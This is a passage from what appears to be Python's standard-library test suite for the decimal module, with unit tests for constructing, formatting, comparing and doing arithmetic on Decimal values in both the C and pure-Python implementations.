@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# negative zero: default behavior
('.1f', '-0', '-0.0'),
('.1f', '-.0', '-0.0'),
('.1f', '-.01', '-0.0'),
# negative zero: z option
('z.1f', '0.', '0.0'),
('z6.1f', '0.', ' 0.0'),
('z6.1f', '-1.', ' -1.0'),
('z.1f', '-0.', '0.0'),
('z.1f', '.01', '0.0'),
('z.1f', '-.01', '0.0'),
('z.2f', '0.', '0.00'),
('z.2f', '-0.', '0.00'),
('z.2f', '.001', '0.00'),
('z.2f', '-.001', '0.00'),
('z.1e', '0.', '0.0e+1'),
('z.1e', '-0.', '0.0e+1'),
('z.1E', '0.', '0.0E+1'),
('z.1E', '-0.', '0.0E+1'),
('z.2e', '-0.001', '-1.00e-3'), # tests for mishandled rounding
('z.2g', '-0.001', '-0.001'),
('z.2%', '-0.001', '-0.10%'),
('zf', '-0.0000', '0.0000'), # non-normalized form is preserved
('z.1f', '-00000.000001', '0.0'),
('z.1f', '-00000.', '0.0'),
('z.1f', '-.0000000000', '0.0'),
('z.2f', '-00000.000001', '0.00'),
('z.2f', '-00000.', '0.00'),
('z.2f', '-.0000000000', '0.00'),
('z.1f', '.09', '0.1'),
('z.1f', '-.09', '-0.1'),
(' z.0f', '-0.', ' 0'),
('+z.0f', '-0.', '+0'),
('-z.0f', '-0.', '0'),
(' z.0f', '-1.', '-1'),
('+z.0f', '-1.', '-1'),
('-z.0f', '-1.', '-1'),
('z>6.1f', '-0.', 'zz-0.0'),
('z>z6.1f', '-0.', 'zzz0.0'),
('x>z6.1f', '-0.', 'xxx0.0'),
('๐ค>z6.1f', '-0.', '๐ค๐ค๐ค0.0'), # multi-byte fill char
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_negative_zero_format_directed_rounding(self):
with self.decimal.localcontext() as ctx:
ctx.rounding = ROUND_CEILING
self.assertEqual(format(self.decimal.Decimal('-0.001'), 'z.2f'),
'0.00')
def test_negative_zero_bad_format(self):
self.assertRaises(ValueError, format, self.decimal.Decimal('1.23'), 'fz')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
